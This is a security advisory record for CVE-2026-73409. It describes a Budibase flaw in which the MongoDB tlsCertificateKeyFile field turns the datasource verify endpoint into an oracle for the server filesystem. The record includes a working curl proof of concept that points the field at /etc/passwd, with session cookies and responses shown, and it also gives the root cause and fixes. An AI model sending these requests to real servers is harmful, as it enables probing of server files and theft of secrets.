{"id":"CVE-2026-73409","aliases":["GHSA-ppr4-5f46-j9c6"],"url":"https://o3.security/vulnerability/CVE-2026-73409","summary":"Budibase: Server Filesystem Existence/Read Oracle via Builder-Controlled MongoDB tlsCertificateKeyFile","details":"## Summary\nWhen creating a MongoDB datasource, Budibase passes the `tlsCertificateKeyFile` and `tlsCAFile` fields straight to the MongoDB driver as server-side file paths. On Budibase Cloud a customer cannot place files on the server, so these fields only let a builder reference arbitrary absolute paths on the underlying multi-tenant server. When the datasource is verified, the driver performs a real filesystem read of that path, and the error differs by file state, turning `/api/datasources/verify` into an arbitrary-path existence/read oracle over the whole server filesystem.\n\n## Root Cause\n`packages/server/src/integrations/mongodb.ts` passes `config.tlsCertificateKeyFile` / `config.tlsCAFile` directly to `new MongoClient(config.connectionString, options)` as filesystem paths, with no allow-list, no confinement to a certificates directory, and no rejection of absolute / `..` paths.\n\nPOC \n## Reproduction — paste each line, press Enter\n\nLine 1 (existing file — proves the file is READ):\n```\ncurl -s -X POST \"https://hasinocompany.budibase.app/api/datasources/verify\" -H \"Cookie: budibase:auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZXNzaW9uSWQiOiJlNDYzZTM0Ni1hZmQ2LTQwNDEtODNmMS1hYmNlNzhjMmExN2QiLCJ1c2VySWQiOiJ1c19jMGY4NDE0NjAxYmQ0ZTk0YTJmMTEzMTAxYzVlNzZkNCIsImVtYWlsIjoiY3liZXJAaGFzaW5vc2VjLmxhdCIsImNzcmZUb2tlbiI6ImU5ZDJlZjQ4LTJiNmEtNDJhZC1hN2ViLTY1NzkzZDg3ZDdlYyIsInRlbmFudElkIjoiaGFzaW5vY29tcGFueSIsImlhdCI6MTc4NDAzNTU1NywiZXhwIjoxNzg0NjQwMzU3fQ.oaxPeSwQ571QDd7pPZZy-G0b4rpI6-wYQqcV2Urwlo8; budibase:auth.sig=exoCxnKfj6IDWg6z04bX4dUcPN0\" -H \"x-csrf-token: e9d2ef48-2b6a-42ad-a7eb-65793d87d7ec\" -H \"x-budibase-app-id: app_dev_hasinocompany_bcb6316e0d014f91939c812389012415\" -H \"Content-Type: application/json\" -d '{\"datasource\":{\"name\":\"probe\",\"source\":\"MONGODB\",\"type\":\"datasource\",\"config\":{\"connectionString\":\"mongodb://127.0.0.1:27017/?tls=true\",\"database\":\"x\",\"tlsCertificateKeyFile\":\"/etc/passwd\"}}}'\n```\n\nRESPONSE\n\n{\"connected\":false,\"error\":\"error:0480006C:PEM routines::no start line\"} \n\n\n\nLine 2 (missing file — path is reflected):\n```\ncurl -s -X POST \"https://hasinocompany.budibase.app/api/datasources/verify\" -H \"Cookie: budibase:auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZXNzaW9uSWQiOiJlNDYzZTM0Ni1hZmQ2LTQwNDEtODNmMS1hYmNlNzhjMmExN2QiLCJ1c2VySWQiOiJ1c19jMGY4NDE0NjAxYmQ0ZTk0YTJmMTEzMTAxYzVlNzZkNCIsImVtYWlsIjoiY3liZXJAaGFzaW5vc2VjLmxhdCIsImNzcmZUb2tlbiI6ImU5ZDJlZjQ4LTJiNmEtNDJhZC1hN2ViLTY1NzkzZDg3ZDdlYyIsInRlbmFudElkIjoiaGFzaW5vY29tcGFueSIsImlhdCI6MTc4NDAzNTU1NywiZXhwIjoxNzg0NjQwMzU3fQ.oaxPeSwQ571QDd7pPZZy-G0b4rpI6-wYQqcV2Urwlo8; budibase:auth.sig=exoCxnKfj6IDWg6z04bX4dUcPN0\" -H \"x-csrf-token: e9d2ef48-2b6a-42ad-a7eb-65793d87d7ec\" -H \"x-budibase-app-id: app_dev_hasinocompany_bcb6316e0d014f91939c812389012415\" -H \"Content-Type: application/json\" -d '{\"datasource\":{\"name\":\"probe\",\"source\":\"MONGODB\",\"type\":\"datasource\",\"config\":{\"connectionString\":\"mongodb://127.0.0.1:27017/?tls=true\",\"database\":\"x\",\"tlsCertificateKeyFile\":\"/nonexistent/pentest/xyz\"}}}'\n```\n\nRESPONSE\n\n{\"connected\":false,\"error\":\"ENOENT: no such file or directory, open '/nonexistent/pentest/xyz'\"}\n\n\n### Actual output\n```text\n/etc/passwd               -> {\"connected\":false,\"error\":\"error:0480006C:PEM routines::no start line\"}          (EXISTS, was READ)\n/nonexistent/pentest/xyz  -> {\"connected\":false,\"error\":\"ENOENT: no such file or directory, open '/nonexistent/pentest/xyz'\"}   (MISSING, path reflected)\n```\nExisting files return a \"PEM routines\" error (the file was read but is not PEM); missing files return `ENOENT ... open '<path>'` with the path echoed back. This confirms a real filesystem read at the attacker-chosen absolute path. Confirmed 3/3 separate runs.\n\n\n\n## Impact\n| Who / what is affected | How |\n|---|---|\n| The underlying multi-tenant Cloud server | Arbitrary-path existence/read oracle from a builder account |\n| Server config / secret files, other tenants' paths | Located by enumerating paths (exists vs missing) |\n| PEM/certificate files on the server | Content exfiltratable via mutual-TLS to an attacker MongoDB server (mechanism) |\n\n## Recommended Fix\n1. On managed/Cloud, disallow `tlsCertificateKeyFile` / `tlsCAFile` as filesystem paths; accept PEM content and write it to a per-connection temp file under a fixed directory.\n2. Reject absolute and `..` paths; confine any file reference to an allow-listed certificates directory.\n3. Route the MongoDB connection host through the SSRF blacklist, as the REST integration already does.","published":"2026-08-12T19:19:59.492Z","modified":"2026-09-10T03:30:39.936284307Z","cvss":null,"epss":{"score":0.00243,"percentile":0.15674,"asOf":"2026-09-17"},"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"npm","name":"@budibase/server","fixedVersion":null}],"fix":{"url":"https://github.com/Budibase/budibase/commit/e58aa31e18272f6a1a8aeb525b7eef0b01b1dd43","label":"Budibase/budibase@e58aa31"},"references":[{"type":"WEB","url":"https://github.com/Budibase/budibase/releases/tag/3.40.1"},{"type":"ADVISORY","url":"https://github.com/Budibase/budibase/security/advisories/GHSA-ppr4-5f46-j9c6"},{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/73xxx/CVE-2026-73409.json"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-73409"},{"type":"FIX","url":"https://github.com/Budibase/budibase/commit/e58aa31e18272f6a1a8aeb525b7eef0b01b1dd43"},{"type":"FIX","url":"https://github.com/Budibase/budibase/pull/19244"},{"type":"WEB","url":"https://github.com/Budibase/budibase/commit/5e19b935536d6d1be1f47100e43c6fb30917826e"},{"type":"PACKAGE","url":"https://github.com/Budibase/budibase"},{"type":"WEB","url":"https://github.com/Budibase/budibase/releases/tag/3.40.0"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-09-10T03:30:39.936284307Z"}}